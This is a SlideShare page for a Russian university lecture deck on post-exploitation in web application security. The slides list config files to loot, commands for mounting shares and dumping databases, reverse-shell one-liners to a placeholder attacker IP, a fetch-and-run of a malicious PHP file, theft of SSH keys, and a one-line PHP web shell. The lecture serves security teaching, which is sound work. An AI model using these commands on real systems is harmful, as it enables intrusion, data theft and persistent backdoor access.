Безопасность весна 2014 лекция 7

407 views

Published on

Published in: Education
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
407
On SlideShare
0
From Embeds
0
Number of Embeds
78
Actions
Shares
0
Downloads
12
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Безопасность весна 2014 лекция 7

  1. 1. Безопасность 
 интернет-приложений
 Лекция 7
 «Пост-эксплуатация»

  2. 2. Жизнь после марса 2 - доступ на выполнение . - данные: хранение. - данные: перехват. - перманентный доступ.
  3. 3. Места раскопок 3 - конфигурация. - исходники. - доступы к окружению. - db.
  4. 4. Конфигурация 4 /etc/passwd /etc/hosts hosts.allow hosts.deny webserver: httpd.conf .htaccess passwd webapp configs
  5. 5. Окружение 5 NFS:. showmount –e target. mount –o nolock –t nfs target:/path /local rsync:. rsync rsync://target/ ftp:. ftp target samba:. smbclient –L target . smbclient targetshare <password> http:. wget, curl, lynx, etc netstat –anp|grep ESTABLISHED
  6. 6. DB 6 mysqldump. mysql –uroot –S /tmp/mysql.sock
  7. 7. доступ на выполнение 7 while ( true ); do read cmd; wget –O – http://target/vuln?$cmd; done web-уязвимость, простейший случай:
  8. 8. доступ на выполнение 8 nc <attacker_ip> <port> -e /bin/bash mknod backpipe p; nc <attacker_ip> <port> 0<backpipe |. /bin/bash 1>backpipe /bin/bash -i > /dev/tcp/<attacker_ip>/<port> 0<&1 2>&1 mknod backpipe p; telnet <attacker_ip> <port> 0<backpipe | /bin/ bash 1>backpipe wget -O /tmp/bd.php <url_to_malicious_file> && php -f /tmp/bd.php telnet <attacker_ip> <1st_port> | /bin/bash | telnet <attacker_ip> <2nd_port>
  9. 9. Данные: перехват 9 - keyloggers. - patched ssh, patched pam-module. - tcpdump. - patched web
  10. 10. Перманентный доступ 10 - системный бэкдор. - аутентификационные данные. - web-бэкдор. - etc
  11. 11. Auth 11 ssh –i privkey user@target /home/user/.ssh/id.dsa. /home/user/.ssh/id.rsa
  12. 12. backdoor 12 - process. - cronjob. - patched binary. - kernel module
  13. 13. web 13 <?php passthru($_REQUEST['c']) ?> .... my @cmd = `$req`;. foreach my $line (@cmd) {. print $line . "<br/>";. }. ... AddType application/x-httpd-php .txt

×